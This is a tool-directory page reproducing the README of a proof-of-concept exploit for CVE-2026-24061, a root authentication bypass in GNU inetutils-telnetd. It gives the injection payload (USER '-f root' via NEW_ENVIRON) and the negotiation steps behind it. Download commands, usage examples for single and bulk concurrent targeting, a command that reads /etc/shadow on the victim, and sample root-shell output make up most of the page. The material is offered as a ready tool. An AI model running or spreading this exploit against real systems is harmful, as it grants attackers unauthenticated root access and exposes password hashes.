Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing unauthenticated remote attackers to gain instant root shell access via malicious NEW_ENVIRON telnet option exploitation. | Kitploit
Tools/GitHubGitHub/sh4den/cve-2026-24061
Privilege EscalationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCommand and ControlAuthenticationPapers & ResearchLearning & EducationRemote Access Tool
GitHub
61122 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
sh4den/cve-2026-24061

CVE-2026-24061

Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing unauthenticated remote attackers to gain instant root shell access via malicious NEW_ENVIRON telnet option exploitation.

View Repository

CVE-2026-24061

GNU inetutils-telnetd - Remote Authentication Bypass

A security research tool for exploiting CVE-2026-24061, a critical remote authentication bypass vulnerability in GNU inetutils-telnetd that allows instant root shell access without authentication.


Table of Contents

  • Vulnerability Summary
  • Affected Versions
  • Technical Analysis
  • Prerequisites
  • Installation
  • Usage
  • Output Reference
  • Exploitation Methodology
  • Mitigation and Remediation
  • Indicators of Compromise
  • Legal Disclaimer
  • References
  • Credits

Vulnerability Summary

FieldValue
CVE IdentifierCVE-2026-24061
CVSS v3.1 Score9.8 (Critical)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE ClassificationCWE-88: Improper Neutralization of Argument Delimiters in a Command
VendorGNU Project
Productinetutils-telnetd
Disclosure DateJanuary 20, 2026
Patch AvailableTBD

Executive Summary

A critical vulnerability exists in GNU inetutils-telnetd through version 2.7 that allows unauthenticated remote attackers to bypass authentication entirely and gain immediate root shell access. The vulnerability is exploited through the NEW_ENVIRON telnet option by injecting a specially crafted USER environment variable with the value "-f root", which bypasses all authentication mechanisms.

Impact Assessment

  • Confidentiality: Complete compromise of system data
  • Integrity: Full system control with root privileges
  • Availability: Potential for complete system takeover or denial of service
  • Scope: Unchanged - exploitation affects only the vulnerable telnet service

Affected Versions

Version RangeStatus
<= 2.7Vulnerable
> 2.7Patch Status TBD

Technical Analysis

Vulnerability Root Cause

The vulnerability originates from improper validation of the USER environment variable in the telnetd NEW_ENVIRON option handler. When processing the NEW_ENVIRON telnet option, the telnetd service fails to sanitize the USER variable value before passing it to the login process. By setting USER to "-f root", the attacker injects command-line arguments that force the authentication to succeed for the root user without requiring credentials.

Attack Vector

  1. Attacker connects to the telnetd service (typically port 23)
  2. During telnet option negotiation, the server requests NEW_ENVIRON data
  3. Attacker responds with USER environment variable set to "-f root"
  4. The malicious argument bypasses authentication checks
  5. Instant root shell is granted without any password prompt
  6. Full system compromise is achieved

Exploitation Complexity

  • Prerequisites: Network access to target telnetd service
  • Authentication: Not required
  • User Interaction: None
  • Attack Complexity: Low

Prerequisites

System Requirements

  • Python 3.7 or higher
  • Network connectivity to target telnetd instance(s)
  • Sufficient permissions to execute Python scripts

Dependencies

All dependencies are part of Python's standard library:

PackagePurpose
socketNetwork communication
selectI/O multiplexing
sysSystem interaction
osOperating system interface
threadingConcurrent target exploitation
datetimeTimestamp formatting

Installation

Method 1: Using Git

# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

Method 2: Direct Download

# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

Method 3: Manual Installation

# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

Usage

Command Line Interface

Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

Single Target Exploitation

Exploit a single telnetd instance:

# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

Command Execution Mode

Execute commands non-interactively:

# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Bulk Target Exploitation

Exploit multiple targets from a file:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

Target File Format (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Notes:

  • One target per line
  • IP addresses or hostnames
  • Empty lines are ignored
  • Targets are exploited concurrently using threading

Output Reference

Status Indicators

IndicatorColorDescription
[SUCCESS]GreenSuccessfully connected to target
[EXPLOIT]GreenExploitation payload sent successfully
[INFO]BlueInformational message about current operation
[ERROR]RedConnection failure, timeout, or exploitation error
[WARNING]YellowWarning message (not currently used)

Sample Output

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Exploitation Methodology

Telnet Protocol Negotiation Process

The exploit leverages the telnet protocol negotiation phase:

  1. Initial Connection: TCP connection established to target port
  2. Option Negotiation: Server sends DO/WILL commands for various telnet options
  3. TTYPE Agreement: Client agrees to send terminal type (WILL TTYPE)
  4. TSPEED Agreement: Client agrees to send terminal speed (WILL TSPEED)
  5. NEW_ENVIRON Agreement: Client agrees to send environment variables (WILL NEW_ENVIRON)
  6. Subnegotiation: Server requests environment variables (SB NEW_ENVIRON SEND)
  7. Payload Injection: Client sends USER="-f root" in NEW_ENVIRON response
  8. Authentication Bypass: Server processes malicious USER variable
  9. Shell Access: Root shell granted without authentication
Download Tool